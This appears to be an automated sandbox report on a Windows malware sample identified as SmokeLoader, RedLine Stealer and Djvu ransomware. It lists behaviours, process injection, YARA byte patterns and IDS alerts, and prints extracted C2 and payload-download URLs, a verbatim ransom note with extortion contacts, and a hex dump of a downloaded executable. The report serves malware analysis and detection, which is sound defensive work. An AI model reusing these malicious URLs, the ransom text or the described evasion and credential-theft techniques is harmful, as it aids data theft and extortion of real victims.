Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:724879
MD5:644232606a176287a73169b177eb8752
SHA1:0a09865b7c29d4a90f7f06af19940580ac7e8847
SHA256:365904fa34452030915b29fcbf60978159e63a6240622ffd72b6d564a591bad4
Tags:exeTeamBot
Infos:

Detection

Djvu, RedLine, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)

Classification

  • System is w10x64
  • file.exe (PID: 5916 cmdline: C:\Users\user\Desktop\file.exe MD5: 644232606A176287A73169B177EB8752)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 6246.exe (PID: 5608 cmdline: C:\Users\user\AppData\Local\Temp\6246.exe MD5: 36FC2440660C5F4509C3ABCDDE9A1C3A)
        • 6246.exe (PID: 1420 cmdline: C:\Users\user\AppData\Local\Temp\6246.exe MD5: 36FC2440660C5F4509C3ABCDDE9A1C3A)
      • 69A9.exe (PID: 5828 cmdline: C:\Users\user\AppData\Local\Temp\69A9.exe MD5: BD0DFD6CBAE2B012D4A5F155D10ED054)
      • 7795.exe (PID: 4132 cmdline: C:\Users\user\AppData\Local\Temp\7795.exe MD5: D878530A6E5C388668853A620D1B6E05)
        • WerFault.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 837D.exe (PID: 2188 cmdline: C:\Users\user\AppData\Local\Temp\837D.exe MD5: D878530A6E5C388668853A620D1B6E05)
        • WerFault.exe (PID: 6036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 8C19.exe (PID: 5088 cmdline: C:\Users\user\AppData\Local\Temp\8C19.exe MD5: D30C815C9E13D428430F2A8B4018D3D5)
      • explorer.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6076 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 4316.exe (PID: 376 cmdline: C:\Users\user\AppData\Local\Temp\4316.exe MD5: 2D29421E985E4FB5F6ABB42FA3A502C1)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • thduhcf (PID: 4692 cmdline: C:\Users\user\AppData\Roaming\thduhcf MD5: 644232606A176287A73169B177EB8752)
  • idduhcf (PID: 5756 cmdline: C:\Users\user\AppData\Roaming\idduhcf MD5: BD0DFD6CBAE2B012D4A5F155D10ED054)
  • cleanup
{"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-o7UXxOstmw\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0585Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA13FAceYhU2U1c4UWTllr\\\\n+Tuk+XUSQ1wltMj4YIkZO8gC\\/eMcKqujI1FVmup+yzqP8wc7QB9LzWX0jrRiMf3T\\\\nN9mx8nxooe9DnpWZGncSgtWk1vBXonr1ZZevgimChx0oyQVD1k79GsnK0vZrGs5D\\\\nsVtmmnmSp81muQRklsiXlDglezOEqDFm3f65a7Ur0bpQdrbw8sX7sHzgrpA2aG1L\\\\nkgTLp28Bvu1qWgNU7y+yD9Gvwt07Zo80Rq8BfZs8aPLLnnUAegSVder50pP1g8zk\\\\nvMMF8vWQsHC5o0vlUMlKsKbuEbgZPHlyJAJuxwW5ehBSg9rT35qrGiSNyTur9fwr\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          Click to see the 62 entries
          SourceRuleDescriptionAuthorStrings
          5.2.thduhcf.700e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            0.2.file.exe.710e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              8.0.6246.exe.400000.3.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
              • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
              8.0.6246.exe.400000.4.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
              • 0xe0dea:$s1: http://
              • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
              • 0xe0dea:$f1: http://
              8.0.6246.exe.400000.4.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
                Click to see the 70 entries
                No Sigma rule has matched
                Timestamp:192.168.2.545.136.151.10249702802851115 10/17/22-22:07:06.666147
                SID:2851115
                Source Port:49702
                Destination Port:80
                Protocol:TCP
                Classtype:Attempted Administrator Privilege Gain
                Timestamp:192.168.2.534.91.216.4949705802039103 10/17/22-22:07:11.143612
                SID:2039103
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5104.21.93.3049692802039103 10/17/22-22:06:42.842374
                SID:2039103
                Source Port:49692
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5185.174.137.17449693802018581 10/17/22-22:06:30.526719
                SID:2018581
                Source Port:49693
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://185.174.137.174/s.exeAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeAvira: detection malicious, Label: HEUR/AGEN.1210630
                Source: file.exeVirustotal: Detection: 38%Perma Link
                Source: file.exeReversingLabs: Detection: 43%
                Source: jamesmillion.xyzVirustotal: Detection: 12%Perma Link
                Source: avtlsgosecure.comVirustotal: Detection: 10%Perma Link
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6246.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\837D.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\4316.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\7795.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\7AF0.exeJoe Sandbox ML: detected
                Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
                Source: 8.0.6246.exe.400000.6.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-o7UXxOstmw\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0585Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: unknownHTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49694 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: \C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb source: 6246.exe, 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: M"C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: aa C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb6K source: 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\xifibezevatem\nebopo.pdb source: 7795.exe, 00000007.00000000.474481270.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 837D.exe, 00000009.00000000.476307271.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 837D.exe.1.dr, 7795.exe.1.dr
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: github.com
                Source: C:\Windows\explorer.exeDomain query: dldsystem.com
                Source: C:\Windows\explorer.exeDomain query: furubujjul.net
                Source: C:\Windows\explorer.exeDomain query: pelegisr.com
                Source: C:\Windows\explorer.exeDomain query: avtlsgosecure.com
                Source: C:\Windows\explorer.exeNetwork Connect: 185.174.137.174 80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49692 -> 104.21.93.30:80
                Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49693 -> 185.174.137.174:80
                Source: TrafficSnort IDS: 2851115 ETPRO TROJAN Win32/Fabookie.ek CnC Activity M2 192.168.2.5:49702 -> 45.136.151.102:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49705 -> 34.91.216.49:80
                Source: DNS query: jamesmillion.xyz
                Source: Malware configuration extractorURLs: http://winnlinne.com/lancer/get.php
                Source: Malware configuration extractorURLs: http://liubertiyyyul.net/
                Source: Malware configuration extractorURLs: http://bururutu44org.org/
                Source: Malware configuration extractorURLs: http://youyouumenia5.org/
                Source: Malware configuration extractorURLs: http://nvulukuluir.net/
                Source: Malware configuration extractorURLs: http://nuluitnulo.me/
                Source: Malware configuration extractorURLs: http://guluiiiimnstra.net/
                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Oct 2022 20:06:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 17 Oct 2022 19:59:09 GMTETag: "36200-5eb4068a369dc"Accept-Ranges: bytesContent-Length: 221696Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 51 4b 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 58 17 00 00 00 00 00 06 a1 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 19 00 00 04 00 00 3c 0b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f3 01 00 28 00 00 00 00 e0 18 00 d8 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 ef 01 00 00 10 00 00 00 f0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 dc 16 00 00 00 02 00 00 22 01 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 4b 00 00 00 e0 18 00 00 4c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
